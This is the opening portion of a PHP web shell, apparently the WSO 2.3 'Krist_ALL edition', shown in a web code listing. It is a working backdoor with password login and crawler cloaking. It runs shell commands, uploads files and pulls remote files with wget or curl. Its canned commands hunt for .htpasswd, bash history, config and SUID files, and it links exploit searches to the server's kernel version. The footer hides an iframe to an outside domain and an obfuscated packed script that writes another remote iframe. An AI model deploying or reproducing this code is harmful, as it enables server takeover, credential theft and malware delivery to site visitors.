home *** CD-ROM | disk | FTP | other *** search
/ ftp.shaw.ca / ftp.shaw.ca.tar / ftp.shaw.ca / sec.php < prev    next >
PHP Script  |  2015-05-22  |  75KB  |  1,893 lines

  1. <?php
  2. $auth_pass = "63a9f0ea7bb98050796b649e85481845"; //root
  3. $t = 1; // 1 - input / 2 - no input;
  4. $color = "lime";
  5. $default_action = "FilesMan";
  6. $default_charset = "Windows-1251";
  7. $default_use_ajax = true;
  8.  
  9. if( !empty($_SERVER['HTTP_USER_AGENT']) ) {
  10.     $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
  11.     foreach($userAgents as $agent)
  12.         if( strpos($_SERVER['HTTP_USER_AGENT'], $agent) !== false ) {
  13.             header('HTTP/1.0 404 Not Found');
  14.             exit;
  15.         }
  16. }
  17. @session_start();
  18. @error_reporting(0);
  19. @ini_set('error_log',NULL);
  20. @ini_set('log_errors',0);
  21. @ini_set('max_execution_time',0);
  22. @set_time_limit(0);
  23. @set_magic_quotes_runtime(0);
  24. @define('VERSION', '2.3');
  25.  
  26.  
  27.  
  28. if( get_magic_quotes_gpc() ) {
  29.     function WSOstripslashes($array) {
  30.         return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
  31.     }
  32.     $_POST = WSOstripslashes($_POST);
  33. }
  34. function wsoLogin() {
  35. echo $t;
  36.     if($GLOBALS['t'] == 1) echo '<form method=post><input type=text name=pass><input type=submit value=ok></form>';
  37.     else  header('HTTP/1.0 401 Unauthorized');
  38.     die();
  39. }
  40. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  41.     if( empty( $auth_pass ) ||
  42.         ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  43.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  44.     else
  45.         wsoLogin();
  46.  
  47. if( strtolower( substr(PHP_OS,0,3) ) == "win" )
  48.     $os = 'win';
  49. else
  50.     $os = 'nix';
  51. $safe_mode = @ini_get('safe_mode');
  52. $disable_functions = @ini_get('disable_functions');
  53. $home_cwd = @getcwd();
  54. if( isset( $_POST['c'] ) )
  55.     @chdir($_POST['c']);
  56. $cwd = @getcwd();
  57. if( $os == 'win') {
  58.     $home_cwd = str_replace("\\", "/", $home_cwd);
  59.     $cwd = str_replace("\\", "/", $cwd);
  60. }
  61. if( $cwd[strlen($cwd)-1] != '/' )
  62.     $cwd .= '/';
  63.  
  64.     if(!isset($_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax']))
  65.     $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$GLOBALS['default_use_ajax'];
  66.     
  67.     
  68. if($os == 'win')
  69.     $aliases = array(
  70.         "List Directory" => "dir",
  71.         "Find index.php in current dir" => "dir /s /w /b index.php",
  72.         "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
  73.         "Show active connections" => "netstat -an",
  74.         "Show running services" => "net start",
  75.         "User accounts" => "net user",
  76.         "Show computers" => "net view",
  77.         "ARP Table" => "arp -a",
  78.         "IP Configuration" => "ipconfig /all"
  79.     );
  80. else  {
  81. $tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/');
  82. $tempdir='./';
  83. foreach( $tempdirs as $item) {
  84. if(@is_writable($item)){$tempdir = $item;}
  85.     }
  86.     
  87.     $aliases = array(
  88.           "List dir" => "ls -lha",
  89.         "list file attributes on a Linux second extended file system" => "lsattr -va",
  90.           "show opened ports" => "netstat -an | grep -i listen",
  91.         "Find" => "",
  92.           "find all suid files" => "find / -type f -perm -04000 -ls",
  93.           "find suid files in current dir" => "find . -type f -perm -04000 -ls",
  94.           "find all sgid files" => "find / -type f -perm -02000 -ls",
  95.           "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
  96.           "find config.inc.php files" => "find / -type f -name config.inc.php",
  97.           "find config* files" => "find / -type f -name \"config*\"",
  98.           "find config* files in current dir" => "find . -type f -name \"config*\"",
  99.           "find all writable folders and files" => "find / -perm -2 -ls",
  100.           "find all writable folders and files in current dir" => "find . -perm -2 -ls",
  101.           "find all service.pwd files" => "find / -type f -name service.pwd",
  102.           "find service.pwd files in current dir" => "find . -type f -name service.pwd",
  103.           "find all .htpasswd files" => "find / -type f -name .htpasswd",
  104.           "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
  105.           "find all .bash_history files" => "find / -type f -name .bash_history",
  106.           "find .bash_history files in current dir" => "find . -type f -name .bash_history",
  107.           "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
  108.           "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
  109.         "Locate" => "",
  110.           "locate httpd.conf files" => "locate httpd.conf",
  111.         "locate vhosts.conf files" => "locate vhosts.conf",
  112.         "locate proftpd.conf files" => "locate proftpd.conf",
  113.         "locate psybnc.conf files" => "locate psybnc.conf",
  114.         "locate my.conf files" => "locate my.conf",
  115.         "locate admin.php files" =>"locate admin.php",
  116.         "locate cfg.php files" => "locate cfg.php",
  117.         "locate conf.php files" => "locate conf.php",
  118.         "locate config.dat files" => "locate config.dat",
  119.         "locate config.php files" => "locate config.php",
  120.         "locate config.inc files" => "locate config.inc",
  121.         "locate config.inc.php" => "locate config.inc.php",
  122.         "locate config.default.php files" => "locate config.default.php",
  123.         "locate config* files " => "locate config",
  124.         "locate .conf files"=>"locate '.conf'",
  125.         "locate .pwd files" => "locate '.pwd'",
  126.         "locate .sql files" => "locate '.sql'",
  127.         "locate .htpasswd files" => "locate '.htpasswd'",
  128.         "locate .bash_history files" => "locate '.bash_history'",
  129.         "locate .mysql_history files" => "locate '.mysql_history'",
  130.         "locate .fetchmailrc files" => "locate '.fetchmailrc'",
  131.         "locate backup files" => "locate backup",
  132.         "locate dump files" => "locate dump",
  133.         "locate priv files" => "locate priv"
  134.  
  135.     );
  136. }
  137. function wsoHeader() {
  138.     if(empty($_POST['charset']))
  139.         $_POST['charset'] = $GLOBALS['default_charset'];
  140.     global $color;
  141.     echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . "</title>
  142. <style>
  143. body{background-color:#000000;color:lime;}
  144. body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:e1e1e1; }
  145. table.info{ color:#00FFCC;background-color:#000000; font:3pt; }
  146. span,h1,a{ color: $color !important; }
  147. span{ font-weight: bolder; }
  148. h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
  149. div.content{ padding: 0px;margin-left:0px;background-color:#333; }
  150. a{ text-decoration:none; }
  151. a:hover{ text-decoration:underline; }
  152. .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
  153. .bigarea{ width:100%;height:250px; }
  154. input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
  155. form{ margin:0px; }
  156. #ttoolsTbl{ text-align:center; }
  157. .toolsInp{ width: 300px }
  158. .main th{text-align:left;background-color:green;}
  159.  
  160. .main tr:hover{background-color:green;}
  161. .l1{background-color:#000}
  162. pre{font-family:Courier,Monospace;}
  163. </style>
  164. <script>
  165.     var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
  166.     var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
  167.     var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
  168.     var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':addslashes(htmlspecialchars($_POST['p1']))) ."';
  169.     var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':addslashes(htmlspecialchars(@$_POST['p2']))) ."';
  170.     var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':addslashes(htmlspecialchars(@$_POST['p3']))) ."';
  171.     function set(a,c,p1,p2,p3,charset) {
  172.         if(a != null)document.mf.a.value=a;else document.mf.a.value=a_;
  173.         if(c != null)document.mf.c.value=c;else document.mf.c.value=c_;
  174.         if(p1 != null)document.mf.p1.value=p1;else document.mf.p1.value=p1_;
  175.         if(p2 != null)document.mf.p2.value=p2;else document.mf.p2.value=p2_;
  176.         if(p3 != null)document.mf.p3.value=p3;else document.mf.p3.value=p3_;
  177.         if(charset != null)document.mf.charset.value=charset;else document.mf.charset.value=charset_;
  178.     }
  179.     function g(a,c,p1,p2,p3,charset) {
  180.         set(a,c,p1,p2,p3,charset);
  181.         document.mf.submit();
  182.     }
  183.     function a(a,c,p1,p2,p3,charset) {
  184.         set(a,c,p1,p2,p3,charset);
  185.         var params = 'ajax=true';
  186.         for(i=0;i<document.mf.elements.length;i++)
  187.             params += '&'+document.mf.elements[i].name+'='+encodeURIComponent(document.mf.elements[i].value);
  188.         sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
  189.     }
  190.     function sr(url, params) {
  191.         if (window.XMLHttpRequest)
  192.             req = new XMLHttpRequest();
  193.         else if (window.ActiveXObject)
  194.             req = new ActiveXObject('Microsoft.XMLHTTP');
  195.         if (req) {
  196.             req.onreadystatechange = processReqChange;
  197.             req.open('POST', url, true);
  198.             req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
  199.             req.send(params);
  200.         }
  201.     }
  202.     function processReqChange() {
  203.         if( (req.readyState == 4) )
  204.             if(req.status == 200) {
  205.                 var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
  206.                 var arr=reg.exec(req.responseText);
  207.                 eval(arr[2].substr(0, arr[1]));
  208.             } else alert('Request error!');
  209.     }
  210. </script>
  211. <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
  212. <form method=post name=mf style='display:none;'>
  213. <input type=hidden name=a>
  214. <input type=hidden name=c>
  215. <input type=hidden name=p1>
  216. <input type=hidden name=p2>
  217. <input type=hidden name=p3>
  218. <input type=hidden name=charset>
  219. </form>";
  220.  
  221. //Div content color:333;
  222.  
  223.     $freeSpace = @diskfreespace($GLOBALS['cwd']);
  224.     $totalSpace = @disk_total_space($GLOBALS['cwd']);
  225.     $totalSpace = $totalSpace?$totalSpace:1;
  226.     $release = @php_uname('r');
  227.     $kernel = @php_uname('s');
  228.     $millink = 'http://milw0rm.com/search.php?dong=';
  229.     if( strpos('Linux', $kernel) !== false )
  230.         $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
  231.     else
  232.         $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
  233.     if(!function_exists('posix_getegid')) {
  234.         $user = @get_current_user();
  235.         $uid = @getmyuid();
  236.         $gid = @getmygid();
  237.         $group = "?";
  238.     } else {
  239.         $uid = @posix_getpwuid(@posix_geteuid());
  240.         $gid = @posix_getgrgid(@posix_getegid());
  241.         $user = $uid['name'];
  242.         $uid = $uid['uid'];
  243.         $group = $gid['name'];
  244.         $gid = $gid['gid'];
  245.     }
  246.     $cwd_links = '';
  247.     $path = explode("/", $GLOBALS['cwd']);
  248.     $n=count($path);
  249.     for($i=0;$i<$n-1;$i++) {
  250.         $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
  251.         for($j=0;$j<=$i;$j++)
  252.             $cwd_links .= $path[$j].'/';
  253.         $cwd_links .= "\")'>".$path[$i]."/</a>";
  254.     }
  255.     $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
  256.     $opt_charsets = '';
  257.     foreach($charsets as $item)
  258.         $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
  259.     $m = array('INFO'=>'SecInfo','FILES'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','TOOLS'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
  260.     if(!empty($GLOBALS['auth_pass']))
  261.         $m['Logout'] = 'Logout';
  262.     $m['DEL'] = 'SelfRemove';
  263.     $menu = '';
  264.     foreach($m as $k => $v)
  265.         $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
  266.     $drives = "";
  267.     if ($GLOBALS['os'] == 'win') {
  268.         foreach( range('c','z') as $drive )
  269.         if (is_dir($drive.':\\'))
  270.             $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
  271.     }
  272.     
  273.     
  274.  
  275.  
  276. $SERVER_SOFTWARE = @substr(getenv('SERVER_SOFTWARE'),0,150);
  277. if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
  278.         
  279.         
  280.         
  281. $Lversion = php_uname(r); 
  282. $OSV = php_uname(s); 
  283. $OSV = str_replace(' ','+',$OSV);
  284. if(stripos('Linux',$OSV) != false) 
  285. $Lversion=substr($Lversion,0,6); 
  286. $google_link='http://www.google.ru/search?q=Linix+Kernel+'.$Lversion.'+exploit';
  287. $paketstorm_link="http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=Linux+Kernel+".$Lversion; 
  288. $exploitdb_link = "http://www.exploit-db.com/search/?action=search&filter_description=linux+Kernel+".substr($Lversion,0,3);
  289. $securitylab_link='http://www.securitylab.ru/search/index.php?q=linux+kernel+'.$Lversion.'+exploit';
  290. $steam = 'linux kernel '.substr($Lversion,0,3);
  291. }else{ 
  292. $Lversion=substr($Lversion,0,3); 
  293.  
  294. $exploitdb_link = "http://www.exploit-db.com/search/?action=search&filter_description=".$OSV.'+'.$Lversion;
  295. $paketstorm_link="http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=".$OSV.'+'.$Lversion; 
  296. $google_link='http://www.google.ru/search?q='.$OSV.'+'.$Lversion.'+exploit';
  297. $securitylab_link='http://www.securitylab.ru/search/index.php?q='.$OSV.'+'.$Lversion.'+exploit';
  298. $steam = $OSV.' '.$Lversion;
  299.  
  300.  
  301.  
  302.  
  303.  
  304.         
  305.         
  306.         
  307.         
  308.         
  309.         
  310.         
  311.         
  312.         
  313.         
  314.         
  315.         
  316.         
  317.         
  318.         
  319.         
  320.         
  321.         
  322. echo '<form action=http://securiteam.com/cgi-bin/htsearch method=post id=steam name=steam>
  323. <input type=hidden name=words value="'.$steam.'">
  324. <input type=hidden name=restrict value=/exploits/>
  325.  
  326. <table class=info  border=0  cellpadding=0 cellspacing=0 width=100%>
  327.     <font size=1><tr> <td width=1><font color=lime><b>Uname: </b></td><td><font color=white>
  328.          '.substr(@php_uname(), 0, 120).'  <a href="'.$google_link.'" target="_blank">[ Google ]</a> <a href="'.$exploitdb_link.'" target=_blank>[ Exploit-db ]</a> <a href="'.$paketstorm_link.'" target=_blank>[ Packetstorm ]</a> <a href="'.$securitylab_link.'" target=_blank>[ Securitylab ]</a> <a href=# onclick=steam.submit(); ttarget=_blank>[ SecurityTeam ]</a></td>   <td rowspan=4 width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.@$_SERVER["SERVER_ADDR"].'<br><span>Your IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></form>
  329.         
  330.         <tr height=1><td width=1><font color=lime><b>Server: </b></td><td><font color=white>'.$SERVER_SOFTWARE.'</td></tr>
  331.         <tr height=1><td width=1><font color=lime><b>User: </b></td><td><font color=white>'.$user.' ( '.$uid.' / '.$gid.' - '.$group.' )       <font color=lime><b>PHP:</b>    <font color=white>'.@phpversion().'</font>  <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a>  <a href=# onclick="g(\'Php\',null,\'\',\'ini\')">[ php.ini ]</a><font color=lime><b>       HDD: </b></font><font color=white>'.wsoViewSize($freeSpace).' / '.wsoViewSize($totalSpace).' ('.round(100/(wsoViewSize($totalSpace)/wsoViewSize($freeSpace)),2).'%)</font>'; 
  332.         $curl_on = @function_exists('curl_version');
  333.         
  334.         echo ' </td></tr>
  335.         <tr><td colspan=2><font color=lime><b>Safe mode: </b>'.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00bb00>OFF</font>').'   <font color=lime><b>Open_basedir:</b></font> ';
  336.         if((@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;};
  337.         if($open_basedir) { if (''==($df=@ini_get('open_basedir'))) {echo "<font color=red>ini_get disable!</font></b>";}else {echo "<font color=red>$df</font></b>";};}
  338.         else {echo "<font color=green>OFF</font></b>";}
  339.         echo "       <font color=lime><b>cURL: </b></font>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>"));
  340.         echo '       ';
  341.         
  342.         
  343.         
  344.  
  345. if(($mysql_on = @function_exists('mysql_connect'))){
  346. echo "<font color=lime><b>MySQL: </b><font color=green>ON";
  347.  
  348. if(function_exists('mysql_get_client_info')) {
  349.  echo ' <font color=white>('.mysql_get_client_info().')'; 
  350.  echo "</font>       "; }
  351.  
  352. echo "</font>       "; } 
  353.  
  354.  
  355.  
  356. if(($mssql_on = @function_exists('mssql_connect'))){
  357. echo "<font color=lime><b>MSSQL: </b><font color=green>ON</font>       "; } 
  358.  
  359.  
  360.  
  361. if(($pg_on = @function_exists('pg_connect'))){
  362. echo "<font color=lime><b>PostgreSQL: </b><font color=green>ON</font>       "; } 
  363.  
  364.  
  365.  
  366.  
  367.  
  368.  
  369.  
  370. if(($ora_on = @function_exists('ocilogon'))){
  371. echo "<font color=lime><b>Oracle: </b><font color=green>ON</font>       "; } 
  372.  
  373.  
  374.  
  375. if(($mysqli_on = @function_exists('mysqli_connect'))){
  376. echo "<font color=lime><b>MySQLi: </b><font color=green>ON</font>       ";
  377.  } 
  378.  
  379.  
  380.  
  381.  
  382. if(($msql_on = @function_exists('msql_connect'))){
  383. echo "<font color=lime><b>mSQL: </b><font color=green>ON</font>       "; } 
  384.  
  385.  
  386.  
  387.  
  388. if(($sqlite_on = @function_exists('sqlite_open'))){
  389. echo "<font color=lime><b>SQLite: </b><font color=green>ON</font>       "; } 
  390.  
  391.         
  392.         
  393.         
  394.         
  395.         
  396.         $countf = 0;
  397.         
  398.         if(''!=($df=@ini_get('disable_functions'))){ $countf +=1; echo "<br><font color=lime><b>Disable: </b><font color=white>".$df.'</font>       ';}
  399.         
  400.         
  401.         $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  402.         $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
  403.         $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  404.             
  405.         
  406.         
  407.         
  408.         $temp=array();
  409.         if( $GLOBALS['os'] == 'nix' ) {
  410.             if(!$GLOBALS['safe_mode']) {
  411.             
  412.                 foreach ($userful as $item)
  413.                     if(wsoWhich($item)){$temp[]=$item;}
  414.                     
  415.             } }
  416.             else {
  417.             //echo implode(', ',$temp);
  418.     if (@function_exists('apache_get_modules') && @in_array('mod_perl',apache_get_modules())) {$temp[]="mod_perl";}
  419.     if (@function_exists('apache_get_modules') && @in_array('mod_include',apache_get_modules())) {$temp[]="mod_include(SSI)";}
  420.     if (@function_exists('pcntl_exec')) {$temp[] = "pcntl_exec";}
  421.     if (@extension_loaded('win32std')) {$temp[]="win32std_loaded";}
  422.     if (@extension_loaded('win32service')) {$temp[]="win32service_loaded";}
  423.     if (@extension_loaded('ffi')) {$temp[]="ffi_loaded";}
  424.     if (@extension_loaded('perl')) {$temp[]="perl_loaded";}
  425.                     }
  426.  if(sizeof($temp) > 0) { $countf +=1; echo '<br><font color=lime><b>Useful: </b><font color=green>'.implode(', ',$temp).'</font><br>'; }
  427.  
  428.  
  429. $temp=array();
  430.     if( $GLOBALS['os'] == 'nix' and !$GLOBALS['safe_mode']) {
  431.            
  432.             
  433.                 foreach ($danger as $item)
  434.                     if(wsoWhich($item)){$temp[]=$item;} } 
  435. if(sizeof($temp) > 0) { $countf +=1; echo '<font color=red><b>Danger: </b>'.implode(', ',$temp).'</font><br>'; }
  436.  
  437.  
  438.  
  439.  
  440.  $temp=array();
  441.     if( $GLOBALS['os'] == 'nix' and !$GLOBALS['safe_mode']) {
  442.            
  443.         $GLOABALS['downloadss'] = array();    
  444.                 foreach ($downloaders as $item)
  445.                     if(wsoWhich($item)){$GLOBALS['downloadss'][]=$item; } } 
  446. //if(sizeof($temp) > 0) { $countf +=1; echo '<font color=yellow><b>Downloaders: </b></font><font color=green>'.implode(', ',$temp).'</font>       '; }
  447.  
  448.  
  449.  
  450.  
  451.  
  452.  
  453.  
  454.  
  455.  
  456.  
  457.  
  458.  
  459.  
  460.  
  461.  
  462.  
  463.  
  464.  
  465.  
  466.  
  467.   if  ($countf > 0) echo '</td></tr><tr><td colspan=2>';
  468.         
  469.         if($GLOBALS['os'] != 'nix')     echo '<font color=lime><b>'.$drives.'    ';
  470.     echo $cwd_links.'   '.wsoPermsColor($GLOBALS['cwd']).'    <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a>';
  471.         
  472.         
  473.         echo '</td></tr>
  474.          
  475.          </table>'.
  476.          
  477.          
  478.          
  479.          '
  480.          
  481.          <table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:0">';
  482. // ∞α≡πΦφ 5 Σδ  ε≥±≥≤∩α
  483.  
  484.          
  485.          
  486.          
  487.          
  488.          
  489.          }
  490.  
  491. function wsoFooter() {
  492.     $is_writable = is_writable($GLOBALS['cwd'])?"<font color=lime>":"<font color=red>";
  493.     echo "
  494. <script type="text/javascript" src="http://j.maxmind.com/app/geoip.js"></script><script type="text/javascript" src="http://counter.olusoft.com/1245361/link.php"></script></div>
  495. <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
  496.     <tr><td><br></td></tr><tr>
  497.         <td><form onsubmit='g(null,this.c.value);return false;'><span>DIR </span></td><td><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
  498.         <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span></td><td><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
  499.     </tr><tr>
  500.         <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>".$is_writable."Make dir:</span></td><td><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
  501.         <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>".$is_writable."Make file:</span></td><td><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
  502.     </tr><tr>
  503.         <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span></td><td><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
  504.         <td><form method='post' ENCTYPE='multipart/form-data'>
  505.         <input type=hidden name=a value='FilesMAn'>
  506.         <input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
  507.         <input type=hidden name=p1 value='uploadFile'>
  508.         <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
  509.         <span>".$is_writable."Upload file:</span></td><td><input class='toolsInp' type=file name=f><input type=submit value='>>'></form></td>
  510.     </tr>";
  511.     
  512.     
  513.     
  514.     
  515.     if(sizeof($GLOBALS['downloadss']) > 0) {
  516.     echo "
  517.     <tr><form onsubmit=\"g('FilesMan',null,'rem',this.updest.value,this.upurl.value,this.remt.value);return false;\">
  518.     <td><font color=lime><b>Remote upload </b></td><td colspan=3><select name=remt>";
  519.     
  520.      foreach($GLOBALS['downloadss'] as $dss) {
  521.      echo "
  522.     <option value=$dss>$dss</option>";
  523. }
  524.     
  525.     echo "</select>
  526.     <input tupe=text name=upurl size=60 value=http://google.com/file.zip>
  527.     <input tupe=text name=updest size=60 value=".htmlspecialchars($GLOBALS['cwd'])."file.zip><input type=submit value='>>'></form>
  528.     
  529.     
  530. </td></tr>";
  531.  
  532. }
  533.  
  534.  
  535.  
  536.  
  537. echo "<tr><td colspan=4 align=center><br><i><b>Krist_ALL edition  - z e b r a</b></i>    </td</tr></table></div><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mkjk.html?i=1461009></iframe><tag5479347351></tag5479347351><script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|85||src|height|255|width|board||88|php|183|tag1|ram'.split('|'),0,{}))</script><tag5479347352></tag5479347352></body></html>";
  538. }
  539.  
  540. if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
  541. if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
  542. function wsoEx($in) {
  543.     $out = '';
  544.     if(function_exists('exec')) {
  545.         @exec($in,$out);
  546.         $out = @join("\n",$out);
  547.     }elseif(function_exists('passthru')) {
  548.         ob_start();
  549.         @passthru($in);
  550.         $out = ob_get_clean();
  551.     }elseif(function_exists('system')) {
  552.         ob_start();
  553.         @system($in);
  554.         $out = ob_get_clean();
  555.     }elseif(function_exists('shell_exec')) {
  556.         $out = shell_exec($in);
  557.     }elseif(is_resource($f = @popen($in,"r"))) {
  558.         $out = "";
  559.         while(!@feof($f))
  560.             $out .= fread($f,1024);
  561.         pclose($f);
  562.     }
  563.     return $out;
  564. }
  565. function wsoViewSize($s) {
  566.     if($s >= 1073741824)
  567.         return sprintf('%1.2f', $s / 1073741824 ). ' GB';
  568.     elseif($s >= 1048576)
  569.         return sprintf('%1.2f', $s / 1048576 ) . ' MB';
  570.     elseif($s >= 1024)
  571.         return sprintf('%1.2f', $s / 1024 ) . ' KB';
  572.     else
  573.         return $s . ' B';
  574. }
  575.  
  576. function wsoPerms($p) {
  577.     if (($p & 0xC000) == 0xC000)$i = 's';
  578.     elseif (($p & 0xA000) == 0xA000)$i = 'l';
  579.     elseif (($p & 0x8000) == 0x8000)$i = '-';
  580.     elseif (($p & 0x6000) == 0x6000)$i = 'b';
  581.     elseif (($p & 0x4000) == 0x4000)$i = 'd';
  582.     elseif (($p & 0x2000) == 0x2000)$i = 'c';
  583.     elseif (($p & 0x1000) == 0x1000)$i = 'p';
  584.     else $i = 'u';
  585.     $i .= (($p & 0x0100) ? 'r' : '-');
  586.     $i .= (($p & 0x0080) ? 'w' : '-');
  587.     $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
  588.     $i .= (($p & 0x0020) ? 'r' : '-');
  589.     $i .= (($p & 0x0010) ? 'w' : '-');
  590.     $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
  591.     $i .= (($p & 0x0004) ? 'r' : '-');
  592.     $i .= (($p & 0x0002) ? 'w' : '-');
  593.     $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
  594.     return $i;
  595. }
  596. function wsoPermsColor($f) {
  597.     if (!@is_readable($f))
  598.         return '<font color=#FF0000><b>'.wsoPerms(@fileperms($f)).'</b></font>';
  599.     elseif (!@is_writable($f))
  600.         return '<font color=white>'.wsoPerms(@fileperms($f)).'</font>';
  601.     else
  602.         return '<font color=lime><b>'.wsoPerms(@fileperms($f)).'</b></font>';
  603. }
  604. if(!function_exists("scandir")) {
  605.     function scandir($dir) {
  606.         $dh  = opendir($dir);
  607.         while (false !== ($filename = readdir($dh))) {
  608.             $files[] = $filename;
  609.         }
  610.         return $files;
  611.     }
  612. }
  613. function wsoWhich($p) {
  614.     $path = wsoEx('which '.$p);
  615.     if(!empty($path))
  616.         return $path;
  617.     return false;
  618. }
  619. function actionSecInfo() {
  620.     wsoHeader();
  621.     echo '<h1>Server information</h1><div class=content>';
  622.     function wsoSecParam($n, $v) {
  623.         $v = trim($v);
  624.         if($v) {
  625.             echo '<span>'.$n.': </span>';
  626.             if(strpos($v, "\n") === false)
  627.                 echo $v.'<br>';
  628.             else
  629.                 echo '<pre class=ml1>'.$v.'</pre>';
  630.         }
  631.     }
  632.  if(function_exists('apache_get_modules'))
  633.         wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
  634.     wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
  635.     wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
  636.     wsoSecParam('Open base dir', @ini_get('open_basedir'));
  637.     wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
